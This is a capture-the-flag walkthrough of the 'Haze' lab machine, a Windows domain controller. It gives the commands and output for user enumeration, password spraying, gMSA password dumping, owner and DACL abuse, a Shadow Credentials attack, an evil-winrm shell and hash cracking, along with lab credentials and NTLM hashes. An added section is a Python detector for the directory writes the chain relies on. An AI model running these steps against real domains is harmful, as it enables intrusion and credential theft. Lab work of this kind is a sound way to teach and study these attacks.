❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.10.11.61     445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.10.11.61     445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.10.11.61     445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.10.11.61     445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.61     445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.10.11.61     445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.10.11.61     445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.10.11.61     445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.10.11.61     445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1112: HAZE\Support_Services (SidTypeGroup)

We generate a wordlist from these users and verify them with kerbrute; seven are valid.

❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > rusers.txt
❯ wc -l rusers.txt
9 rusers.txt
❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb rusers.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 08:00:37 >  Using KDC(s):
2025/04/02 08:00:37 >  	dc01.haze.htb:88

2025/04/02 08:00:37 >  [+] VALID USERNAME:	Administrator@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	paul.taylor@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	DC01$@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	edward.martin@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	mark.adams@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	Haze-IT-Backup$@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	alexander.green@haze.htb
2025/04/02 08:00:37 >  Done! Tested 9 usernames (7 valid) in 0.224 seconds

Password Spraying

We run netexec for password spraying and find that paul.taylor's password is reused by mark.adams.

❯ netexec smb 10.10.11.61 -u reg_users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [-] haze.htb\NT AUTHORITY@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\HAZE-IT-BACKUP$@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\PAUL.TAYLOR@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 

We see that mark.adams has WinRM access.

❯ netexec winrm 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

Bloodhound

We run bloodhound again, this time with mark.adams's credentials; it now shows eight users.

❯ python bloodhound.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 39S
INFO: Compressing output into 20250402123700_bloodhound.zip

It shows that mark.adams belongs to the GMSA_MANAGERS group.

image

We run a bloodhound query showing who can read gMSA passwords: the Administrators and Domain Admins groups can read Haze-It-Backup$. The GMSA_MANAGERS group is not listed.

image

gMSA Permissions

The gMSA_Permissions_Collection.ps1 script by kdejoyce, used in the post Securing Your Group Managed Service Accounts, lists the permissions held by the objects that have rights over a managed service account (MSA).

In this case we would be listing the permissions over Haze-IT-Backup$.

# Build a lookup of schemaIDGUID -> attribute name for ms-DS-GroupMSAMembership,
# the attribute that controls who may retrieve the managed password. ACE
# ObjectType GUIDs are matched against it in the second pass below.
$schemaIDGUID = @{}
Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext -LDAPFilter '(name=ms-ds-GroupMSAMembership)' -Properties name, schemaIDGUID |
ForEach-Object {$schemaIDGUID.add([System.GUID]$_.schemaIDGUID,$_.name)}

# The gMSA whose ACL is inspected (requires the ActiveDirectory module).
$target = 'Haze-IT-Backup$'
$gMSAs = Get-ADServiceAccount -identity $target 

# Pass 1: allow ACEs granting GenericAll, or WriteProperty on the whole object
# (null ObjectType GUID) - full control over the account object.
Set-Location ad:
foreach ($gmsa in $gMSAs){
(Get-Acl $gmsa.distinguishedname).access | 
Where-Object { (($_.AccessControlType -eq 'Allow') -and ($_.activedirectoryrights -in ('GenericAll') -and $_.inheritancetype -in ('All', 'None')) -or (($_.activedirectoryrights -like '*WriteProperty*') -and ($_.objecttype -eq '00000000-0000-0000-0000-000000000000')))} |
 ft ([string]$gmsa.name),identityreference, activedirectoryrights, objecttype, isinherited -autosize 
 }

# Pass 2: allow ACEs granting WriteProperty specifically on ms-DS-GroupMSAMembership,
# i.e. the right to change which principals can read the gMSA password.
Set-Location ad:
foreach ($gmsa in $gMSAs){
(Get-Acl $gmsa.distinguishedname).access | 
Where-Object {(($_.AccessControlType -eq 'Allow') -and (($_.activedirectoryrights -like '*WriteProperty*') -and ($_.objecttype -in $schemaIDGUID.Keys)))} |
 ft ([string]$gmsa.name),identityreference, activedirectoryrights, objecttype, isinherited -AutoSize
 }

We see that gMSA_Managers has the WriteProperty right over Haze-IT-Backup$, scoped to the ms-DS-GroupMSAMembership attribute.

*Evil-WinRM* PS C:\Users\mark.adams\Documents> <# the code above [ snip ] ... #>

Haze-IT-Backup IdentityReference                                                                               ActiveDirectoryRights ObjectType                           IsInherited
-------------- -----------------                                                                               --------------------- ----------                           -----------
               NT AUTHORITY\SYSTEM                                                                                        GenericAll 00000000-0000-0000-0000-000000000000       False
               BUILTIN\Account Operators                                                                                  GenericAll 00000000-0000-0000-0000-000000000000       False
               HAZE\Domain Admins                                                                                         GenericAll 00000000-0000-0000-0000-000000000000       False
               HAZE\Enterprise Admins                                                                                     GenericAll 00000000-0000-0000-0000-000000000000        True
               BUILTIN\Administrators    CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner 00000000-0000-0000-0000-000000000000        True



Haze-IT-Backup IdentityReference  ActiveDirectoryRights ObjectType                           IsInherited
-------------- -----------------  --------------------- ----------                           -----------
               HAZE\gMSA_Managers         WriteProperty 888eedd6-ce04-df40-b462-b8a50e41ba38       False


*Evil-WinRM* PS AD:\>

WriteProperty

We see that the value of PrincipalsAllowedToRetrieveManagedPassword "points" to the Domain Admins group.

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity Haze-IT-Backup -Properties PrincipalsAllowedToRetrieveManagedPassword


DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :


*Evil-WinRM* PS C:\Users\mark.adams\Documents>

With the WriteProperty permission we can change this attribute to the user mark.adams; listing it again shows the change.

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity Haze-IT-Backup -PrincipalsAllowedToRetrieveManagedPassword mark.adams
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity Haze-IT-Backup -Properties PrincipalsAllowedToRetrieveManagedPassword


DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :


*Evil-WinRM* PS C:\Users\mark.adams\Documents> 

ReadGMSAPassword

We can use netexec or gMSADumper to obtain the NTLM hash.

❯ netexec ldap 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: a70df6599d5eab1502b38f9c1c3fd828
❯ python gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -l haze.htb -d haze.htb
Users or groups who can read password for Haze-IT-Backup$:
 > mark.adams
Haze-IT-Backup$:::a70df6599d5eab1502b38f9c1c3fd828
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:a455156dcce482f3ac359929b41d2f5ead1d72dd764b7f5d9f27a8c2a44a67a6
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:d99b9f57ffe1a4ab867a018a99a7edab

User - Haze-It-Backup

With the account's hash we see that we only have access to LDAP and SMB; WinRM fails.

❯ netexec ldap 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828 
❯ netexec smb 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828 
❯ netexec winrm 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [-] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828

Bloodhound

We run BloodHound again, this time as the haze-it-backup$ account.

❯ python bloodhound.py -u haze-it-backup$ --hashes :a70df6599d5eab1502b38f9c1c3fd828 -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 40S
INFO: Compressing output into 20250402133856_bloodhound.zip

Haze-It-Backup has WriteOwner over the SUPPORT_SERVICES group.

image

SUPPORT_SERVICES has ForceChangePassword and AddKeyCredentialLink over the user Edward Martin.

image

With this we have a path from Haze-It-Backup to Edward Martin.

image

User - Edward.Martin

WriteOwner on Group

We request a ticket for haze-it-backup$ using its hash, then run impacket-owneredit to change the owner of SUPPORT_SERVICES to haze-it-backup$.

❯ impacket-getTGT haze.htb/haze-it-backup -hashes :a70df6599d5eab1502b38f9c1c3fd828
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in haze-it-backup$.ccache

export KRB5CCNAME=haze-it-backup$.ccache; impacket-owneredit -action write -new-owner 'haze-it-backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb/haze-it-backup$' -k -no-pass -dc-ip 10.10.11.61 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!

We run impacket-dacledit to give haze-it-backup$ 'Full Control' over SUPPORT_SERVICES (the command as run grants the WriteMembers right, which is all the next step needs).

❯ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'haze-it-backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb/haze-it-backup$' -k -no-pass -dc-ip 10.10.11.61 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250402-135928.bak
[*] DACL modified successfully!

With bloodyAD.py we add the user haze-it-backup$ to the SUPPORT_SERVICES group.

KRB5CCNAME=~/htb/haze/haze-it-backup$.ccache python bloodyAD.py --host "dc01.haze.htb" --dc-ip 10.10.11.61 -d "haze.htb" -u 'haze-it-backup$' -k add groupMember "SUPPORT_SERVICES" "haze-it-backup$"
[+] haze-it-backup$ added to SUPPORT_SERVICES

Shadow Credentials

We run PyWhisker to perform the Shadow Credentials attack against edward.martin.

KRB5CCNAME=~/htb/haze/haze-it-backup$.ccache python pywhisker/pywhisker.py -d "haze.htb" -u "haze-it-backup$" -H :a70df6599d5eab1502b38f9c1c3fd828 --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a907891c-4d46-6da9-a574-17fb026be17d
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: V8RHny77.pfx
[+] PFX exportiert nach: V8RHny77.pfx
[i] Passwort für PFX: 5zdcbIoP8UGpALBXEuLt
[+] Saved PFX (#PKCS12) certificate & key at path: V8RHny77.pfx
[*] Must be used with password: 5zdcbIoP8UGpALBXEuLt
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
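Each step of this chain (the PrincipalsAllowedToRetrieveManagedPassword change, the owner and DACL edits on SUPPORT_SERVICES, and the msDS-KeyCredentialLink write just above) is a directory attribute modification, and a domain controller with "Audit Directory Service Changes" enabled and a write SACL on the objects records each one as Security event 5136. The following added example, which is not part of the original writeup or of any of the tools it uses, parses 5136 events in the Windows event XML layout and flags writes to these three attributes by anyone outside an allowlist. The sample events are constructed to mirror this page's chain; the field names are the real 5136 EventData names, while the allowlisted account HAZE\svc-provisioning and the attribute values are assumptions.

```python
"""Flag the directory writes behind the chain above from Security event 5136.

Added example, not part of the original writeup. The events below are
constructed to mirror the three modifications on this page; the Data names
are the real 5136 EventData names, the values are made up.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Attributes whose modification rarely happens outside provisioning, mapped to
# the technique the write enables.
WATCHED_ATTRIBUTES = {
    "msDS-GroupMSAMembership": "gMSA password readers changed "
                               "(PrincipalsAllowedToRetrieveManagedPassword)",
    "msDS-KeyCredentialLink": "Shadow Credentials (key trust added to account)",
    "nTSecurityDescriptor": "owner or DACL rewritten on the object",
}

# 5136 OperationType codes: %%14674 = Value Added, %%14675 = Value Deleted.
OPERATIONS = {"%%14674": "added", "%%14675": "deleted"}

# Principals expected to write these attributes (constructed allowlist; in a
# real forest this is the provisioning account or group).
EXPECTED_WRITERS = {"HAZE\\svc-provisioning"}


@dataclass
class Finding:
    subject: str
    object_dn: str
    attribute: str
    operation: str
    technique: str


def _data(event, name):
    """Return the text of the EventData/Data element with the given Name."""
    node = event.find(f"./e:EventData/e:Data[@Name='{name}']", NS)
    return (node.text or "") if node is not None else ""


def analyze_event(xml_text):
    """Return a Finding for a suspicious 5136 event, or None."""
    event = ET.fromstring(xml_text)
    event_id = event.findtext("./e:System/e:EventID", default="", namespaces=NS)
    if event_id != "5136":
        return None
    attribute = _data(event, "AttributeLDAPDisplayName")
    if attribute not in WATCHED_ATTRIBUTES:
        return None
    subject = f"{_data(event, 'SubjectDomainName')}\\{_data(event, 'SubjectUserName')}"
    if subject in EXPECTED_WRITERS:
        return None
    op_code = _data(event, "OperationType")
    return Finding(subject=subject, object_dn=_data(event, "ObjectDN"),
                   attribute=attribute, operation=OPERATIONS.get(op_code, op_code),
                   technique=WATCHED_ATTRIBUTES[attribute])


def analyze_events(xml_events):
    """Run analyze_event over raw event XML strings, keeping only hits."""
    return [f for f in map(analyze_event, xml_events) if f is not None]


def make_event(user, domain, object_dn, object_class, attribute, op="%%14674"):
    """Build a constructed 5136 event in the Windows event XML layout."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID><Computer>dc01.haze.htb</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">{user}</Data>
    <Data Name="SubjectDomainName">{domain}</Data>
    <Data Name="DSName">haze.htb</Data>
    <Data Name="ObjectDN">{object_dn}</Data>
    <Data Name="ObjectClass">{object_class}</Data>
    <Data Name="AttributeLDAPDisplayName">{attribute}</Data>
    <Data Name="AttributeValue">[binary value omitted]</Data>
    <Data Name="OperationType">{op}</Data>
  </EventData>
</Event>"""


# Constructed events: the three writes from this chain plus two benign ones.
SAMPLE_EVENTS = [
    make_event("mark.adams", "HAZE",
               "CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb",
               "msDS-GroupManagedServiceAccount", "msDS-GroupMSAMembership"),
    make_event("haze-it-backup$", "HAZE", "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb",
               "group", "nTSecurityDescriptor"),
    make_event("haze-it-backup$", "HAZE", "CN=Edward Martin,CN=Users,DC=haze,DC=htb",
               "user", "msDS-KeyCredentialLink"),
    # Benign: the (assumed) provisioning account rotating gMSA readers.
    make_event("svc-provisioning", "HAZE",
               "CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb",
               "msDS-GroupManagedServiceAccount", "msDS-GroupMSAMembership"),
    # Benign: an attribute that is not on the watchlist.
    make_event("edward.martin", "HAZE", "CN=Edward Martin,CN=Users,DC=haze,DC=htb",
               "user", "description"),
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f.subject} {f.operation} {f.attribute} on {f.object_dn}: {f.technique}")
```

The attribute list is deliberately short: these three attributes are written by normal administration only during provisioning, so an allowlist of writers plus an alert on everything else keeps the rule quiet. Event 5136 is only generated when the Directory Service Changes subcategory is audited and the object's SACL covers the write, so the SACL on managed service accounts, privileged groups and user objects has to be in place before this rule sees anything.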

PKINITtools is suggested for obtaining the TGT, but certipy-ad simplifies this and also gives us edward.martin's NT hash.

❯ certipy-ad cert -export -pfx "V8RHny77.pfx" -password "5zdcbIoP8UGpALBXEuLt" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "edward.martin" -domain "haze.htb"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Got hash for 'edward.martin@haze.htb': aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af

The user has WinRM access.

❯ netexec winrm 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\edward.martin:09e0b3eeb2e7a6b0d419e9ff8f4d91af (Pwn3d!)

Shell

We got a shell with evil-winrm and access to the user.txt flag.

❯ evil-winrm -i haze.htb -u 'edward.martin' -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> whoami
haze\edward.martin
*Evil-WinRM* PS C:\Users\edward.martin\Documents> type ../Desktop/user.txt
543ad4c4afe331f2e1e328338e7b55d5
*Evil-WinRM* PS C:\Users\edward.martin\Documents>

User - alexander.green

We ran BloodHound once more as edward.martin; the user belongs to the BACKUP_REVIEWERS group, which holds no permissions over any user or group.

image

Splunk Backup

We find the Backups\ directory, which Administrators and the Backup_Reviewers group can access.

*Evil-WinRM* PS C:\Users\edward.martin> cd C:/
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:32 AM                Backups
d-----         3/25/2025   2:06 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          3/4/2025  11:28 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---          4/2/2025   9:43 AM                Users
d-----         3/25/2025   2:15 PM                Windows

*Evil-WinRM* PS C:\> icacls Backups
Backups HAZE\Backup_Reviewers:(OI)(CI)(RX)
        CREATOR OWNER:(OI)(CI)(IO)(F)
        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
        BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\>

Inside this directory we find what, going by its name, is a Splunk backup, which we download.

*Evil-WinRM* PS C:\> cd backups
*Evil-WinRM* PS C:\backups> dir


    Directory: C:\backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:33 AM                Splunk


*Evil-WinRM* PS C:\backups> cd Splunk
*Evil-WinRM* PS C:\backups\Splunk> dir


    Directory: C:\backups\Splunk


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   3:22 PM       27445566 splunk_backup_2024-08-06.zip


*Evil-WinRM* PS C:\backups\Splunk> download splunk_backup_2024-08-06.zip
                                        
Info: Downloading C:\backups\Splunk\splunk_backup_2024-08-06.zip to splunk_backup_2024-08-06.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\backups\Splunk>

Extracting it we see a backup of the Splunk folder.

❯ ll
drwxrwxr-x kali kali 4.0 KB Tue Aug  6 22:52:06 2024  Splunk
.rw-rw-r-- kali kali  26 MB Wed Apr  2 14:14:45 2025  splunk_backup_2024-08-06.zip
cd Splunk
❯ ls
 bin     etc   opt          quarantined_files   swidtag   copyright.txt      license-eula.txt   README-splunk.txt
 cmake   lib   Python-3.7   share               var       license-eula.rtf   openssl.cnf        splunk-9.2.1-78803f08aabb-windows-64-manifest

Hashcat

We try to crack the hash from etc/passwd, but it is not in the rockyou wordlist.

❯ cat etc/passwd
:admin:$6$8FRibWS3pDNoVWHU$vTW2NYea7GiZoN0nE6asP6xQsec44MlcK2ZehY5RC4xeTAz4kVVcbCkQ9xBI2c7A8VPmajczPOBjcVgccXbr9/::Administrator:admin:changeme@example.com:::19934
PS C:\Users\sckull\Documents\hashcat-6.2.6> .\hashcat.exe -m 1800 ..\hash\haze_admin_splunk_backup rockyou.txt
hashcat (v6.2.6) starting

[...]

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 281 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[...]

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$8FRibWS3pDNoVWHU$vTW2NYea7GiZoN0nE6asP6xQsec44Ml...cXbr9/
Time.Started.....: Wed Apr 02 04:22:01 2025 (2 mins, 55 secs)
Time.Estimated...: Wed Apr 02 04:24:56 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    82050 H/s (6.72ms) @ Accel:64 Loops:256 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4864-5000
Candidate.Engine.: Device Generator
